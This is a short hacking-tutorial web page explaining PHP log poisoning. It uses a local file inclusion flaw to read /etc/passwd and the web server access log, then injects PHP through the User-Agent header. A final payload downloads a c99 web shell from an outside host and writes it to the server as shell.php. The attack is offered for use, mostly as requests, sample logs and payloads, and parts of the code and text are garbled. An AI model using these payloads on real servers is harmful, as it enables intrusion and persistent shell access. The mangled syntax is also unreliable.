Log poisoning is a technique that not many know about.
this technique works only if you can make an LFI of the page.
if we say that you call index.php, which is vulnerable to LFI
and writes index.php? inc =../../../ var / www / logs / access.log

So you see that it will produce a logfile.
that looks something like this:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”

As you can see logs serve our user-agent
If we change our user-agent to: <? Php echo ‘test’;?>
Can we hope the following restultat:
11.11.11.11 – – [05/Feb/2004: 21:34:01 -0600] “GET / tindex.php? Inc = HTTP/1.1” 200 230 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1 ; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:04 -0600] “GET / tindex.php? Inc =../../../ etc / passwd HTTP/1.1” 200 175 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11”
11.11.11.11– [05/Feb/2004: 21:34:07 -0600] “GET / index.php? Inc = test.php HTTP/1.1” 200 134 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US, rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 ”
11.11.11.11 – – [05/Feb/2004: 21:34:08 -0600] “GET / index.php? Inc =../../../ var / www / logs / access.log HTTP/1.1 “200 164” – “” test ”
As you can see, were running our PHP question.
change it as our user-agent to:
<? php fwrite (fopen ( ‘shell.php’, ‘w’), file_get_contents ( ‘hxxp: / / hack3r.org/path/to/c99.txt’)); die;?>
so it creates a file called shell.php with our shell script in.
And wopidoo, we have shell access.

Explore More

Hacking PHP 4.4

This tut Shows how to hack Sites running: Php 4.4 Sites. Step 1 – Search for them Yep,make a Google dork to find sites running Apache and PHP 4.4 .

Read More

Prevent spam in your Gmail account

Are you worried about spam in your precious gmail account ? If yes, then you would like to consider making aliases of your gmail id to use when you’re not

Read More

Recommended Firewall Freebies

A couple of very good free firewall programs you might consider installing include * ZoneAlarm from http://www.zonelabs.com * SyGate from http://www.sygate.com TIP If you really like the idea of a

Read More